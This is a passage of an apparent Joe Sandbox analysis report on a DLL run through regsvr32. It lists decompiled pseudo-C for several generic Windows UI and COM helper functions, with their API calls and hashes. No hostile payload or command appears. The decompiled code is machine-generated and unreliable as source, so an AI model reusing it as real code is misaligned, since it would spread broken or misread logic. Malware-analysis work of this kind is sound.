					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10047725(_t16);
			}








                                                                                                                0x1001bf72
                                                                                                                0x1001bf75
                                                                                                                0x1001bf7d
                                                                                                                0x1001bf83
                                                                                                                0x1001bf83
                                                                                                                0x1001bf8b
                                                                                                                0x1001bf92
                                                                                                                0x1001bf92
                                                                                                                0x1001bf9b
                                                                                                                0x1001bf9d
                                                                                                                0x1001bfa3
                                                                                                                0x1001bfa6
                                                                                                                0x1001bfab
                                                                                                                0x1001bfab
                                                                                                                0x1001bfa6
                                                                                                                0x1001bfb5
                                                                                                                0x1001bfba
                                                                                                                0x1001bfc2
                                                                                                                0x1001bfc7
                                                                                                                0x1001bfc7
                                                                                                                0x1001bfcd
                                                                                                                0x1001bfd5

                                                                                                                APIs
                                                                                                                • EnableWindow.USER32(?,00000001), ref: 1001BF92
                                                                                                                • GetActiveWindow.USER32 ref: 1001BF9D
                                                                                                                • SetActiveWindow.USER32(?), ref: 1001BFAB
                                                                                                                • FreeResource.KERNEL32(?,?,00000024,10002FE0,0000035C), ref: 1001BFC7
                                                                                                                  • Part of subcall function 10017979: EnableWindow.USER32(?,?), ref: 10017986
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ActiveEnable$FreeResource
                                                                                                                • String ID:
                                                                                                                • API String ID: 253586258-0
                                                                                                                • Opcode ID: f401b38f590cd6103beac2c03769a77f2c2e0e13847f51a37e67072dcf924825
                                                                                                                • Instruction ID: 2dfd2c675befebd13602439ac80d080b0f4b14b99b8caaf01a23d8a7659fb49f
                                                                                                                • Opcode Fuzzy Hash: f401b38f590cd6103beac2c03769a77f2c2e0e13847f51a37e67072dcf924825
                                                                                                                • Instruction Fuzzy Hash: 78F0FF34900A14CBDF11DB64CD8559DB7F1FF48742F600569E542761A1D732AD81CF51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10044171 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E10044171(void* __ebx, void* __ecx, void* __eflags) {
				signed int _t8;
				int _t9;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t11 = __ecx;
				_t13 = __ecx;
				E10043DEE(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E10013FEA(__ebx, _t11, _t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t14 = _t13 + 0x84;
				_t8 =  *_t14;
				if(_t8 != 0) {
					_t9 = ReleaseDC( *(_t12 + 0x20),  *(_t8 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t9;
				}
				return _t8;
			}









                                                                                                                0x10044171
                                                                                                                0x10044175
                                                                                                                0x10044177
                                                                                                                0x1004417c
                                                                                                                0x10044190
                                                                                                                0x10044192
                                                                                                                0x10044198
                                                                                                                0x1004419e
                                                                                                                0x100441a2
                                                                                                                0x100441aa
                                                                                                                0x100441b0
                                                                                                                0x00000000
                                                                                                                0x100441b0
                                                                                                                0x100441b5

                                                                                                                APIs
                                                                                                                  • Part of subcall function 10043DEE: GetStockObject.GDI32(00000000), ref: 10043E04
                                                                                                                  • Part of subcall function 10043DEE: InflateRect.USER32 ref: 10043E9D
                                                                                                                • ReleaseCapture.USER32 ref: 1004417C
                                                                                                                • GetDesktopWindow.USER32 ref: 10044182
                                                                                                                • LockWindowUpdate.USER32(00000000), ref: 10044192
                                                                                                                • ReleaseDC.USER32(?,?), ref: 100441AA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1260764132-0
                                                                                                                • Opcode ID: 487d8e1f1d22c55ea9116bb0c082156a6a80de7b46ba3d7d2777d51c7725f6e5
                                                                                                                • Instruction ID: 30137e4151670ee796189177492b211ccbe665d0b2e8e252d8abed00b3cce6c8
                                                                                                                • Opcode Fuzzy Hash: 487d8e1f1d22c55ea9116bb0c082156a6a80de7b46ba3d7d2777d51c7725f6e5
                                                                                                                • Instruction Fuzzy Hash: D2E04F36900221ABEB206B75DD4DF857BA4FF41352F164474F545CB0B1CE76D8A0CB54
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003BB79 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E1003BB79(intOrPtr _a4, intOrPtr _a8) {
				long _t4;
				long _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;

				_t14 = _a4;
				if(_a4 == 0) {
					__eflags =  *0x100bdee8;
					if( *0x100bdee8 == 0) {
						_t5 = GetTickCount();
						 *0x100bdee8 =  *0x100bdee8 + 1;
						__eflags =  *0x100bdee8;
						 *0x100b9a80 = _t5;
					}
					_t4 = GetTickCount() -  *0x100b9a80;
					__eflags = _t4 - 0xea60;
					if(_t4 > 0xea60) {
						__imp__CoFreeUnusedLibraries();
						_t4 = GetTickCount();
						 *0x100b9a80 = _t4;
					}
					return _t4;
				}
				return E1003BB22(_t7, _t8, _t9, _t13, _t14, _a8);
			}









                                                                                                                0x1003bb79
                                                                                                                0x1003bb7e
                                                                                                                0x1003bb8b
                                                                                                                0x1003bb99
                                                                                                                0x1003bb9b
                                                                                                                0x1003bb9d
                                                                                                                0x1003bb9d
                                                                                                                0x1003bba3
                                                                                                                0x1003bba3
                                                                                                                0x1003bbaa
                                                                                                                0x1003bbb0
                                                                                                                0x1003bbb5
                                                                                                                0x1003bbb7
                                                                                                                0x1003bbbd
                                                                                                                0x1003bbbf
                                                                                                                0x1003bbbf
                                                                                                                0x00000000
                                                                                                                0x1003bbc4
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetTickCount.KERNEL32 ref: 1003BB9B
                                                                                                                • GetTickCount.KERNEL32 ref: 1003BBA8
                                                                                                                • CoFreeUnusedLibraries.OLE32 ref: 1003BBB7
                                                                                                                • GetTickCount.KERNEL32 ref: 1003BBBD
                                                                                                                  • Part of subcall function 1003BB22: CoFreeUnusedLibraries.OLE32 ref: 1003BB66
                                                                                                                  • Part of subcall function 1003BB22: OleUninitialize.OLE32 ref: 1003BB6C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 685759847-0
                                                                                                                • Opcode ID: 3af299c7df0d54441f7949af5ec22983bfc3968e9bc5e5849aa0150a3ab0181d
                                                                                                                • Instruction ID: 8eba64989bf9d3bfc4ba9ed942be2444cb3907f9553e26a8a35902e1a4101070
                                                                                                                • Opcode Fuzzy Hash: 3af299c7df0d54441f7949af5ec22983bfc3968e9bc5e5849aa0150a3ab0181d
                                                                                                                • Instruction Fuzzy Hash: 28E0ED358145358FE351FB64CCC4689BBE4FB8631AF104A67E1529A468CBB05881DA92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003068C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E1003068C(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t106;
				signed int _t118;
				intOrPtr* _t122;
				signed int _t138;
				signed int _t146;
				void* _t149;
				signed int _t150;
				signed int _t174;
				signed int _t176;
				void* _t177;
				void* _t182;
				signed int _t184;
				void* _t185;
				void* _t187;

				_t186 = __ecx;
				_t146 = 0;
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					__eflags =  *(__ecx + 0x40);
					if( *(__ecx + 0x40) == 0) {
						L9:
						_t149 = 0;
						__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
						 *(_t186 + 0x38) = _t146;
						if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
							L12:
							_t103 =  *(_t186 + 0x38);
							__eflags = _t103 - _t146;
							if(__eflags > 0) {
								_t176 = 0x30;
								_t172 = _t103 * _t176 >> 0x20;
								_t167 =  ~(__eflags > 0) | _t103 * _t176;
								 *((intOrPtr*)(_t186 + 0x3c)) = E10009F14( ~(__eflags > 0) | _t103 * _t176, _t167);
							}
							__eflags =  *((intOrPtr*)(_t186 + 0x10)) - _t146;
							_v12 = _t146;
							_v16 = _t146;
							if( *((intOrPtr*)(_t186 + 0x10)) <= _t146) {
								L21:
								_t150 =  *(_t186 + 0x38);
								_t104 =  *((intOrPtr*)(_t186 + 8));
								 *((intOrPtr*)( *_t104 + 0x10))(_t104, _t150,  *((intOrPtr*)(_t186 + 0x3c)), _t150 << 4, _t146);
								_t106 =  *(_t186 + 0x38);
								__eflags = _t106 - _t146;
								if(__eflags != 0) {
									_t174 = 0x10;
									_t156 =  ~(__eflags > 0) | _t106 * _t174;
									 *(_t186 + 0x40) = E10009F14( ~(__eflags > 0) | _t106 * _t174, _t156);
								}
								__eflags =  *(_t186 + 0x38) - _t146;
								if( *(_t186 + 0x38) <= _t146) {
									L26:
									E1002FDB9(_t186);
									return  *((intOrPtr*)( *_t186 + 0x10))();
								} else {
									_t182 = 0;
									__eflags = 0;
									do {
										E10049170(_t182,  *(_t186 + 0x40) + _t182, 0, 0x10);
										 *(_t182 +  *(_t186 + 0x40)) =  *(_t182 +  *(_t186 + 0x40)) & 0x00000000;
										_t187 = _t187 + 0xc;
										_t146 = _t146 + 1;
										_t182 = _t182 + 0x10;
										__eflags = _t146 -  *(_t186 + 0x38);
									} while (_t146 <  *(_t186 + 0x38));
									goto L26;
								}
							} else {
								_v8 = _t146;
								do {
									_t118 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t186 + 0x14)) + _v8 + 0x24)) + 4));
									__eflags = _t118 - _t146;
									_v20 = _t118;
									if(_t118 == _t146) {
										goto L20;
									}
									_t184 = _v12 * 0x30;
									__eflags = _t184;
									do {
										_t122 = E10012115( &_v20);
										E1002D337(_t172,  *((intOrPtr*)(_t186 + 0x3c)) + _t184,  *((intOrPtr*)(_t186 + 0x14)) + _v8);
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x18) = _v12 << 4;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x1c) & 0x00000000;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x24) | 0xffffffff;
										 *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) =  *(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x20) | 0xffffffff;
										_v12 = _v12 + 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x28)) = 1;
										 *((intOrPtr*)(_t184 +  *((intOrPtr*)(_t186 + 0x3c)) + 0x2c)) =  *((intOrPtr*)( *_t122 + 0xa0));
										_t184 = _t184 + 0x30;
										__eflags = _v20;
									} while (_v20 != 0);
									_t146 = 0;
									__eflags = 0;
									L20:
									_v16 = _v16 + 1;
									_v8 = _v8 + 0x28;
									__eflags = _v16 -  *((intOrPtr*)(_t186 + 0x10));
								} while (_v16 <  *((intOrPtr*)(_t186 + 0x10)));
								goto L21;
							}
						}
						_t138 =  *((intOrPtr*)(_t186 + 0x14)) + 0x24;
						__eflags = _t138;
						do {
							_t177 =  *_t138;
							_t172 =  *(_t177 + 0xc);
							 *(_t186 + 0x38) =  *(_t186 + 0x38) +  *(_t177 + 0xc);
							_t149 = _t149 + 1;
							_t138 = _t138 + 0x28;
							__eflags = _t149 -  *((intOrPtr*)(_t186 + 0x10));
						} while (_t149 <  *((intOrPtr*)(_t186 + 0x10)));
						goto L12;
					}
					_t185 = 0;
					__eflags =  *(__ecx + 0x38);
					if( *(__ecx + 0x38) <= 0) {
						L8:
						 *(_t186 + 0x40) = _t146;
						goto L9;
					}
					_v12 = 0;
					do {
						__imp__#9( *(__ecx + 0x40) + _v12);
						_v12 = _v12 + 0x10;
						_t185 = _t185 + 1;
						__eflags = _t185 -  *(__ecx + 0x38);
					} while (_t185 <  *(__ecx + 0x38));
					__eflags =  *(__ecx + 0x38);
					if(__eflags > 0) {
						_push( *(__ecx + 0x40));
						E10009F3F(0, _t185, __ecx, __eflags);
						_push( *((intOrPtr*)(_t186 + 0x3c)));
						E10009F3F(0, _t185, _t186, __eflags);
					}
					goto L8;
				}
				E1002FDB9(__ecx);
				return  *((intOrPtr*)( *__ecx + 0x10))();
			}



























                                                                                                                0x10030694
                                                                                                                0x10030696
                                                                                                                0x1003069b
                                                                                                                0x100306ae
                                                                                                                0x100306b2
                                                                                                                0x100306ef
                                                                                                                0x100306ef
                                                                                                                0x100306f1
                                                                                                                0x100306f4
                                                                                                                0x100306f7
                                                                                                                0x10030710
                                                                                                                0x10030710
                                                                                                                0x10030713
                                                                                                                0x10030715
                                                                                                                0x1003071b
                                                                                                                0x1003071c
                                                                                                                0x10030723
                                                                                                                0x1003072c
                                                                                                                0x1003072c
                                                                                                                0x1003072f
                                                                                                                0x10030732
                                                                                                                0x10030735
                                                                                                                0x10030738
                                                                                                                0x100307e2
                                                                                                                0x100307e2
                                                                                                                0x100307e5
                                                                                                                0x100307f6
                                                                                                                0x100307f9
                                                                                                                0x100307fc
                                                                                                                0x100307fe
                                                                                                                0x10030804
                                                                                                                0x1003080c
                                                                                                                0x10030815
                                                                                                                0x10030815
                                                                                                                0x10030818
                                                                                                                0x1003081b
                                                                                                                0x10030842
                                                                                                                0x10030844
                                                                                                                0x00000000
                                                                                                                0x1003081d
                                                                                                                0x1003081d
                                                                                                                0x1003081d
                                                                                                                0x1003081f
                                                                                                                0x10030829
                                                                                                                0x10030831
                                                                                                                0x10030836
                                                                                                                0x10030839
                                                                                                                0x1003083a
                                                                                                                0x1003083d
                                                                                                                0x1003083d
                                                                                                                0x00000000
                                                                                                                0x1003081f
                                                                                                                0x1003073e
                                                                                                                0x1003073e
                                                                                                                0x10030741
                                                                                                                0x1003074b
                                                                                                                0x1003074e
                                                                                                                0x10030750
                                                                                                                0x10030753
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10030758
                                                                                                                0x10030758
                                                                                                                0x1003075b
                                                                                                                0x10030769
                                                                                                                0x1003077f
                                                                                                                0x1003078d
                                                                                                                0x10030794
                                                                                                                0x1003079c
                                                                                                                0x100307a4
                                                                                                                0x100307ac
                                                                                                                0x100307af
                                                                                                                0x100307c0
                                                                                                                0x100307c4
                                                                                                                0x100307c7
                                                                                                                0x100307c7
                                                                                                                0x100307cd
                                                                                                                0x100307cd
                                                                                                                0x100307cf
                                                                                                                0x100307cf
                                                                                                                0x100307d5
                                                                                                                0x100307d9
                                                                                                                0x100307d9
                                                                                                                0x00000000
                                                                                                                0x10030741
                                                                                                                0x10030738
                                                                                                                0x100306fc
                                                                                                                0x100306fc
                                                                                                                0x100306ff
                                                                                                                0x100306ff
                                                                                                                0x10030701
                                                                                                                0x10030704
                                                                                                                0x10030707
                                                                                                                0x10030708
                                                                                                                0x1003070b
                                                                                                                0x1003070b
                                                                                                                0x00000000
                                                                                                                0x100306ff
                                                                                                                0x100306b4
                                                                                                                0x100306b6
                                                                                                                0x100306b9
                                                                                                                0x100306ec
                                                                                                                0x100306ec
                                                                                                                0x00000000
                                                                                                                0x100306ec
                                                                                                                0x100306bb
                                                                                                                0x100306be
                                                                                                                0x100306c5
                                                                                                                0x100306cb
                                                                                                                0x100306cf
                                                                                                                0x100306d0
                                                                                                                0x100306d0
                                                                                                                0x100306d5
                                                                                                                0x100306d8
                                                                                                                0x100306da
                                                                                                                0x100306dd
                                                                                                                0x100306e2
                                                                                                                0x100306e5
                                                                                                                0x100306eb
                                                                                                                0x00000000
                                                                                                                0x100306d8
                                                                                                                0x1003069d
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClearVariant
                                                                                                                • String ID: (
                                                                                                                • API String ID: 1473721057-3887548279
                                                                                                                • Opcode ID: 09606ba36b7aecd50468a09a55177cada03553f3ba25f0a45b1df38c9686ac77
                                                                                                                • Instruction ID: 497c310cc3923061e9ddd0617e68816462549549d5104481a026dd38a865dc70
                                                                                                                • Opcode Fuzzy Hash: 09606ba36b7aecd50468a09a55177cada03553f3ba25f0a45b1df38c9686ac77
                                                                                                                • Instruction Fuzzy Hash: 89519875A00B01DFDB64CF68C98296AB7F1FF48314B604A6DE5828BA92C770F881CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1002E109 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 150COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E1002E109(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				signed int _v4;
				void* _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v56;
				char _v60;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				short _v84;
				signed int _v88;
				signed int _v92;
				short _v96;
				short _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				intOrPtr _v120;
				char _v124;
				signed int* _t79;
				void* _t90;
				intOrPtr _t97;
				intOrPtr* _t114;
				intOrPtr* _t116;
				intOrPtr* _t118;
				signed int _t120;
				signed int _t128;
				signed int _t131;
				intOrPtr _t132;
				void* _t155;

				_t153 = __edi;
				_push(0x70);
				E1004764D(0x100902ef, __ebx, __edi, __esi);
				_t155 = __ecx;
				_t79 =  *(__ecx + 0x50);
				_t128 = 0;
				_t131 = 0 | _t79 != 0x00000000;
				if(_t131 != 0) {
					_push( &_v16);
					_push(0x100a5eec);
					_v16 = 0;
					_t131 =  *_t79;
					_push(_t79);
					_v20 = 0;
					if( *_t131() < 0) {
						L19:
						return E10047725(_v20);
					} else {
						if((0 | _v16 != 0x00000000) == 0) {
							goto L4;
						} else {
							_v120 = __ecx + 0xc8;
							_v112 = __ecx + 0xd8;
							_v108 = __ecx + 0xdc;
							_v124 = 0x40;
							_v116 = 0;
							_v88 = 0;
							_v76 = 0;
							_v72 = 0;
							E100235FF( &_v36);
							_t97 =  *((intOrPtr*)(__ecx + 0x20));
							_v4 = 0;
							if(_t97 == 0) {
								goto L4;
							} else {
								_t153 =  *((intOrPtr*)(_t97 + 0x20));
								_v104 = 0;
								if(_t153 == 0) {
									goto L4;
								} else {
									do {
										_t31 = _t128 + 0x1009df98; // 0xfffffd3b
										 *((intOrPtr*)( *_t153 + 0x104))(_t155,  *_t31,  &_v36);
										if(_v28 != 0) {
											_t34 = _t128 + 0x1009df9c; // 0x4
											_v104 = _v104 |  *_t34;
										}
										_t128 = _t128 + 8;
									} while (_t128 < 0x40);
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd40,  &_v36);
									_v100 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd43,  &_v36);
									_v96 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd34,  &_v36);
									_v84 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd3f,  &_v36);
									_v80 = _v28;
									 *((intOrPtr*)( *_t153 + 0x104))(_t155, 0xfffffd41,  &_v36);
									_t114 = _v28;
									_push( &_v92);
									_push(0x100a601c);
									_push(_t114);
									if( *((intOrPtr*)( *_t114))() < 0) {
										_v92 = _v92 & 0x00000000;
									}
									_t116 = _v16;
									_push( &_v60);
									_push( &_v124);
									_v60 = 0x18;
									_push(_t116);
									if( *((intOrPtr*)( *_t116 + 0xc))() >= 0) {
										 *((intOrPtr*)(_t155 + 0x70)) = _v56;
										 *((intOrPtr*)(_t155 + 0x60)) = _v48;
										 *((intOrPtr*)(_t155 + 0x64)) = _v44;
										_v20 = 1;
									}
									_t118 = _v16;
									 *((intOrPtr*)( *_t118 + 8))(_t118);
									_t120 = _v92;
									if(_t120 != 0) {
										 *((intOrPtr*)( *_t120 + 8))(_t120);
									}
									__imp__#9( &_v36);
									goto L19;
								}
							}
						}
					}
				} else {
					L4:
					_push(_t131);
					_v24 = 0x100b8618;
					L10048E48( &_v24, 0x100aff30);
					asm("int3");
					_push(4);
					E1004764D(0x1008dd26, _t128, _t153, _t155);
					_t132 = E10020454(0x104);
					_v36 = _t132;
					_t90 = 0;
					_v24 = 0;
					if(_t132 != 0) {
						_t90 = E1001DB72(_t132);
					}
					return E10047725(_t90);
				}
			}






































                                                                                                                0x1002e109
                                                                                                                0x1002e109
                                                                                                                0x1002e110
                                                                                                                0x1002e115
                                                                                                                0x1002e117
                                                                                                                0x1002e11c
                                                                                                                0x1002e120
                                                                                                                0x1002e125
                                                                                                                0x1002e12f
                                                                                                                0x1002e130
                                                                                                                0x1002e135
                                                                                                                0x1002e138
                                                                                                                0x1002e13a
                                                                                                                0x1002e13b
                                                                                                                0x1002e142
                                                                                                                0x1002e2b7
                                                                                                                0x1002e2bf
                                                                                                                0x1002e148
                                                                                                                0x1002e152
                                                                                                                0x00000000
                                                                                                                0x1002e154
                                                                                                                0x1002e15a
                                                                                                                0x1002e163
                                                                                                                0x1002e16c
                                                                                                                0x1002e173
                                                                                                                0x1002e17a
                                                                                                                0x1002e17d
                                                                                                                0x1002e180
                                                                                                                0x1002e183
                                                                                                                0x1002e186
                                                                                                                0x1002e18b
                                                                                                                0x1002e190
                                                                                                                0x1002e193
                                                                                                                0x00000000
                                                                                                                0x1002e195
                                                                                                                0x1002e195
                                                                                                                0x1002e19a
                                                                                                                0x1002e19d
                                                                                                                0x00000000
                                                                                                                0x1002e19f
                                                                                                                0x1002e19f
                                                                                                                0x1002e1a5
                                                                                                                0x1002e1ae
                                                                                                                0x1002e1b9
                                                                                                                0x1002e1bb
                                                                                                                0x1002e1c1
                                                                                                                0x1002e1c1
                                                                                                                0x1002e1c4
                                                                                                                0x1002e1c7
                                                                                                                0x1002e1da
                                                                                                                0x1002e1ec
                                                                                                                0x1002e1f4
                                                                                                                0x1002e206
                                                                                                                0x1002e20e
                                                                                                                0x1002e221
                                                                                                                0x1002e229
                                                                                                                0x1002e23b
                                                                                                                0x1002e243
                                                                                                                0x1002e249
                                                                                                                0x1002e251
                                                                                                                0x1002e252
                                                                                                                0x1002e257
                                                                                                                0x1002e25c
                                                                                                                0x1002e25e
                                                                                                                0x1002e25e
                                                                                                                0x1002e262
                                                                                                                0x1002e268
                                                                                                                0x1002e26c
                                                                                                                0x1002e26d
                                                                                                                0x1002e276
                                                                                                                0x1002e27c
                                                                                                                0x1002e281
                                                                                                                0x1002e287
                                                                                                                0x1002e28d
                                                                                                                0x1002e290
                                                                                                                0x1002e290
                                                                                                                0x1002e297
                                                                                                                0x1002e29d
                                                                                                                0x1002e2a0
                                                                                                                0x1002e2a5
                                                                                                                0x1002e2aa
                                                                                                                0x1002e2aa
                                                                                                                0x1002e2b1
                                                                                                                0x00000000
                                                                                                                0x1002e2b1
                                                                                                                0x1002e19d
                                                                                                                0x1002e193
                                                                                                                0x1002e152
                                                                                                                0x1002e127
                                                                                                                0x1002e127
                                                                                                                0x1000a06c
                                                                                                                0x1000a076
                                                                                                                0x1000a07d
                                                                                                                0x1000a082
                                                                                                                0x1000a083
                                                                                                                0x1000a08a
                                                                                                                0x1000a099
                                                                                                                0x1000a09b
                                                                                                                0x1000a09e
                                                                                                                0x1000a0a2
                                                                                                                0x1000a0a5
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0a7
                                                                                                                0x1000a0b1
                                                                                                                0x1000a0b1

                                                                                                                APIs
                                                                                                                Strings
